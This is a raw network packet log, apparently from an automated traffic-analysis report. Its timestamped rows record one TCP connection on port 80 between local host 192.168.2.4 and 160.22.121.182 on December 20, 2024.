Dec 20, 2024 10:22:04.714366913 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.714447021 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:04.717969894 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.718060017 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.718116045 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:04.721651077 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.721797943 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.721857071 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:04.725516081 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.725636005 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.725678921 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:04.729058981 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.729198933 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.729258060 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:04.732762098 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.732876062 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.732948065 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:04.736464977 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.736572981 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.736634016 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:04.740326881 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.740461111 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.740537882 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:04.743917942 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.744026899 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.744083881 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:04.747838974 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.747915983 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.747965097 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:04.751291037 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.751437902 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.751494884 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:04.755064011 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.755135059 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.755198956 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:04.758723021 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.758868933 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.759062052 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:04.762456894 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.762533903 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.762584925 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:04.766103029 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.766247034 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.766304016 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:04.769895077 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.769992113 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.770047903 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:04.773554087 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.773658037 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.773701906 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:04.777232885 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.777375937 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.777446032 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:04.780951023 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.781048059 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.781097889 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:04.784629107 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.784749031 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.784815073 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:04.788374901 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.788506985 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.789589882 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:04.792083979 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.792196035 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.792268991 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:04.795790911 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.795869112 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.795938015 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:04.799479008 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.799535036 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.799608946 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:04.803169012 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.803338051 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.803611994 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:04.806917906 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.807044029 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.807096004 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:04.810632944 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.810683012 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.810735941 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:04.814393997 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.814537048 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.814806938 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:04.818042994 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.818144083 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.818200111 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:04.821834087 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.873217106 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:04.957957029 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.958075047 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.958126068 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:04.959264040 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.959372997 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.959594965 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:04.962007999 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.962061882 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.962120056 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:04.964832067 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.964843035 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.964895964 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:04.967420101 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.967525959 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.967581987 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:04.970069885 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.970186949 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.970240116 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:04.972956896 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.973004103 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.973150015 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:04.975428104 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.975554943 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.975661993 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:04.978224039 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.978682995 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.978743076 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:04.980830908 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.980952978 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.980997086 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:04.983557940 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.983753920 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.983800888 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:04.986229897 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.986336946 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.986393929 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:04.988908052 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.989017010 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.989324093 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:04.991642952 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.991740942 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.991807938 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:04.994280100 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.994452000 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.994498968 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:04.997004032 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.997097969 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.997148991 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:04.999685049 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.999794960 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:04.999861002 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.002345085 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.002450943 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.002504110 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.005050898 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.005179882 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.005235910 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.007776022 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.007855892 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.007961035 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.010453939 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.010576010 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.010647058 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.013107061 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.013202906 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.013293982 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.015835047 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.015924931 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.015997887 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.018508911 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.018623114 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.018681049 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.021193027 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.021311045 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.021365881 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.023929119 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.024102926 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.024164915 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.026556969 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.026669979 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.026721001 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.029262066 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.029370070 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.029421091 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.032021999 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.032123089 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.032171011 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.034663916 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.034782887 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.034838915 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.037333965 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.037576914 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.037659883 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.040054083 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.040211916 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.040261030 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.042737007 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.042886972 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.042932034 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.045488119 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.045571089 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.045622110 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.048182964 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.048296928 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.048342943 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.050901890 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.050945044 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.050992966 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.053682089 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.053791046 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.053837061 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.056195021 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.056287050 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.056330919 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.058876038 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.059016943 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.059063911 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.061557055 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.061671019 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.061718941 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.064380884 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.064455986 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.064512968 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.066988945 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.067074060 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.067182064 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.211268902 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.211345911 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.211409092 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.212263107 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.212342978 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.212385893 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.214248896 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.214339018 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.214396954 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.216279984 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.216454983 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.216553926 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.218307972 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.218445063 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.218503952 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.220808029 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.221005917 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.221163034 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.223186970 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.223270893 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.223335981 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.224976063 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.225100040 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.225152969 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.226475954 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.226584911 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.226633072 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.228544950 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.228629112 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.228682995 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.230552912 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.230675936 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.230739117 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.232614040 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.232773066 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.232826948 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.234704018 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.234891891 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.234950066 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.236834049 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.236984968 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.237035990 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.238749027 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.238815069 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.238897085 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.240807056 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.240843058 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.240905046 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.242876053 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.243002892 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.243062973 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.244889975 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.244973898 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.245018959 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.246927023 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.247041941 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.247087955 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.248975039 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.249068022 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.249186039 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.251034975 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.251159906 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.251266956 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.253065109 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.253185987 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.253242970 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.255075932 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.255172014 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.255219936 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.257124901 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.257219076 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.257258892 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.259183884 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.259335041 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.259387970 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.261229038 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.261327028 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.261373043 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.263268948 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.263339996 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.263449907 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.265321016 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.265420914 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.265474081 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.267352104 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.267467976 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.267524004 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.269375086 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.269432068 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.269489050 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.271447897 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.271562099 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.271611929 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.273469925 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.273544073 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.273591995 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.275629044 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.275687933 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.275731087 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.277585030 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.277744055 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.277791023 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.279617071 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.279711962 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.279753923 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.281627893 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.281754971 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.281796932 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.283732891 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.283925056 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.283973932 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.285767078 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.285878897 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.285929918 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.287781954 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.287929058 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.287981987 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.289854050 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.289992094 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.290045977 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.291934013 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.291985035 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.292040110 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.293956041 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.294049978 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.294101000 CET	49730	80	192.168.2.4	160.22.121.182
